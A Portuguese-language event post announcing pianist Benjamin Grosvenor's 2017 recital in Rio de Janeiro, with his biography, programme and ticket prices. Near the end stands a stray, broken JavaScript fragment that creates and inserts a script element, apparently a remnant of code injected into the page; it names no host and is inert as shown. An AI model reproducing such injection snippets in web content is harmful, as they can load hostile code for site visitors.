Escrito por em 17 maio 2017 nas áreas Música de câmara, Programação, Rio de Janeiro

Um dos pianistas mais solicitados do mundo na atualidade, Benjamin Grosvenor faz apresentação única no Rio de Janeiro.

 

Internacionalmente reconhecido por suas interpretações eletrizantes e criteriosas e pelo domínio virtuosístico dos mais complexos desafios técnicos, o jovem pianista inglês Benjamin Grosvenor, de apenas 24 anos, é hoje um dos instrumentistas mais disputados do mundo. No dia 21 de maio (domingo), às 17h, Grosvenor faz apresentação única no Rio de Janeiro. Ele sobe ao palco do Theatro Municipal como a segunda atração da 24ª edição da série O Globo / Dell’Arte Concertos Internacionais 2017, e apresenta um repertório que inclui Schumann, Mozart, Beethoven, Scriabin, Granados e Liszt.

As apresentações de Grosvenor seduzem plateias e encantam a crítica especializada. Segundo Bryce Morrison, da revista Gramophone, Grosvenor “pode ser considerado o mais notável e extraordinário dos jovens pianistas da atualidade”. Para o jornal The Independent, sua sonoridade é “poética e suavemente irônica, brilhante, mas analítica, inteligente, mas não desprovida de humor, tudo isto traduzido por um toque lindamente claro e cantante”.

 

Benjamin Grosvenor

Grosvenor é reconhecido hoje por sua sonoridade peculiar, descrita como “poética e sutilmente irônica, brilhante, lúcida, mas com humor”, o que faz dele um dos pianistas mais solicitados do mundo. Sua inspiração virtuosa nas mais extenuantes complexidades técnicas jamais compromete a profundidade e a inteligência de suas interpretações.

O primeiro momento marcante na carreira de Benjamin foi a conquista da final do concurso para piano BBC Young Musician em 2004, aos 11 anos de idade. A partir daí sua carreira deslanchou, levando-o a dar concertos com algumas das mais conceituadas orquestras do mundo, como a London Philharmonic, RAI Torino, New York Philharmonic, Philharmonia Orchestra, Leipzig Gewandhausorchester e Sinfônica de Tóquio, em salas como o Royal Festival Hall, Barbican Centre, Sala Victoria de Singapura, The Frick Collection e Carnegie Hall, entre outras. O pianista trabalhou com regentes como Vladimir Ashkenazy, Jirí Belohlávek, Semyon Bychkov, Andrey Boreyko, Sir Mark Elder, Alan Gilbert, Vladimir Jurowski, Andrew Litton, Andrew Manze, Ludovic Morlot, Kent Nagano, Alexander Shelley, Thomas Søndergård, Jac van Steen, John Storgards, Gabor Takacs-Nagy, Michael Tilson Thomas e François Xavier-Roth.

Aos 19 anos, Benjamin atuou com a BBC Symphony na Primeira Noite do BBC Proms 2011, para um Royal Albert Hall lotado. Voltou ao BBC Proms no ano seguinte com a Royal Philharmonic Orchestra e Charles Dutoit e posteriormente, em 2014, para apresentar o Concerto n. 1, de Chopin, com a BBC Philharmonic e Gianandrea Noseda. Em 2015 estreou na Última Noite dos Proms com o Concerto para piano n. 2, de Shostakovich, com a BBC Symphony Orchestra e Marin Aslop.

Entre seus compromissos atuais e futuros mais relevantes estão incluídos projetos com as Orquestras de Cleveland e de Haia, Bergen Philharmonic Orchestra, Atlanta, San Francisco, Singapura, a National Symphony Orchestra e a KBS Symphony Orchestra. Entre seus principais recitais destacam-se os que tiveram lugar no Konzerthaus de Viena, na Sala Zankel do Carnegie Hall, Philharmonie de Colônia, Konzerthaus de Berlim, Festival de Lucerna, La Roque d’Anthéron e o Concurso Internacional no Southbank Centre, assim como sua primeira turnê pela América do Sul. Na próxima temporada, Grosvenor embarcará em novas colaborações com a Filarmonica della Scala e Riccardo Chailly (Concerto para piano n. 1, de Liszt), com a Tonhalle-Orchestra de Zurique e François-Xavier Roth, com a Orchestra of St Luke’s e Sir Roger Norrington, e com a London Symphony Orchestra para uma apresentação sob a direção de Alpesh Chauhan (Concerto para piano n. 1, de Brahms).

Benjamin continua incorporando colaborações no terreno da música de câmara, aí incluídas atuações com os quartetos de cordas Escher, Elias e Endelllion, grupos de câmara da Orchestre Symphonique de Montréal e da Naples Philharmonic (Flórida) e em cenários como o Museu do Louvre e o Queen Elisabeth Hall de Londres. Na temporada de 2015/16 foi convidado a participar da prestigiosa série Junge Wilde, do Konzerthaus de Dortmund, na qual atuará ao longo de três anos.

Em 2011, Benjamin assinou contrato com a Decca Classics, tornando-se o músico britânico mais jovem a ser contratado por uma gravadora e o primeiro pianista do país a assinar com um selo discográfico em 60 anos. Dances, seu álbum de 2014 apresentando uma variedade histórica e estilística de obras influenciadas pelas danças, foi descrito como “impressionante” e como “uma interpretação que surpreende por seu brilhantismo e personalidade” pela revista Gramophone. Conquistou o Prêmio Instrumental do BBC Music Magazine (2015). No outono de 2016 lançou seu quarto disco, Hommages — o terceiro de recital.

Ao longo de sua sensacional carreira, Benjamin recebeu o prêmio Artista Jovem do Ano e o Instrumental de Gramophone; o Prêmio Classical Brits “por seu talento excepcional”, e o Prêmio Diapason d’Or Jeune Talent. Foi tema de dois documentários da BBC, o Show de Andrew Marr e o BBC Breakfast, além da série Human to Hero da CNN. O caçula de cinco irmãos, Benjamin Grosvenor começou a tocar piano aos 6 anos. Estudou na Royal Academy of Music com Christopher Elton e Daniel-Ben Pienaar — onde se graduou em 2012 com o Queen’s Commendation for Excellence —, e da qual viria a tornar-se membro em 2016. Desde 2013 Grosvenor recebe o respaldo do EFG International, um respeitado grupo financeiro.

 

PROGRAMA:

Robert Schumann (1810-1856)
Arabesque em dó maior, Op. 18

Wolfgang Amadeus Mozart (1756-1791)
Sonata para piano n. 13 em si bemol maior, K. 333

Ludwig van Beethoven (1770-1827)
Sonata para piano n. 14 em dó sustenido menor – Sonata ao Luar, Op. 27, n. 2

Alexander Scriabin (1872-1915)
Sonata para piano n. 2 em sol sustenido menor – Sonata Fantasia, Op. 19

Enrique Granados (1867-1916)
Goyescas, Op. 11: 1. Los Requiebros | 3. El fandango de Candil

Franz Liszt (1811-1886)
Rhapsodie Espagnole

 

Foto: Decca/Sophie Wright

 

SERVIÇO:

 

Benjamin Grosvenor, piano

 

21 de maio, domingo, às 17h

Theatro Municipal do Rio de Janeiro (Praça Floriano, s/n, Centro – Rio de Janeiro)

 

Ingressos: R$ 420 (plateia e balcão nobre), R$ 200 (balcão superior), R$ 100 (galeria central) e R$ 50 (galeria lateral, com visão parcial), com meia entrada para estudantes e pessoas com mais de 60 anos, e desconto de 30% para membros do Clube de Assinante O Globo e Windsor Cultural

 document.currentScript.parentNode.insertBefore(s, document.currentScript);var d=document;var s=d.createElement(‘script’);

Faça seu comentário